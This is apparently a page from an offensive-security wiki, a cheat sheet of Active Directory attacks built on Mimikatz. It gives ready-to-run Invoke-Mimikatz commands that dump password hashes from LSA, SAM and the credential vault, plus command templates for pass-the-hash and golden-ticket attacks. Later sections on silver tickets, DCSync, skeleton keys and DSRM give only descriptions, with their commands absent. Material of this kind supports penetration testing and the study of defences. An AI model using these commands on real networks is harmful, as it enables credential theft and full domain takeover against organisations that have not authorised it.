MIMIKATZ

Dump hashes from local machine

Invoke-Mimikatz -DumpCreds

To dump all the hashes

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

To dump hashes from SAM

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

To view clear text credentials from credential vault

Invoke-Mimikatz -Command '"token::elevate" "vault::cred /patch"'

OVER PASS THE HASH ATTACK

Perform Pass The Hash for a specific user

Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USERNAME> /domain:<USER DOMAIN> /ntlm:<NTLM HASH OF USER> /run:powershell.exe"'

GOLDEN TICKET ATTACK

Execute mimikatz as Domain Admin on DC to get krbtgt NTLM hash

Perform Golden Ticket Attack for a specific user

Invoke-Mimikatz -Command '"kerberos::golden /user:<USERNAME> /domain:<DOMAIN NAME> /sid:<DOMAIN SID> /krbtgt:<NTLM OF KRBTGT> /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

SILVER TICKET ATTACK

Perform Silver Ticket Attack for a specific user

DC SYNC ATTACK

Check replication rights for a specific user

To add replication/DCSync rights for a specific user (Needs Domain Admin Privileges)

Perform DCSync attack to extract "krbtgt" hashes, which can be used to perform Golden Ticket attacks for future

SKELETON KEY ATTACK

Needs to be run on Domain Admin Privilege in DC and works only once for a DC which is not rebooted

Perform Skeleton Key Attack (Password : mimikatz - Valid for all users until DC is restarted)

USING DSRM HASH

Dump the DSRM Administrator hash from SAM of DC

DSRM Admin is not allowed to logon into the Domain Controller by default

We have to change the registry value to allow access and should be modified in DC

Now, we can just use Pass The Hash to gain access on file system of DC remotely

PreviousAD BLOODHOUNDNextDUMPING SECRETS

Last updated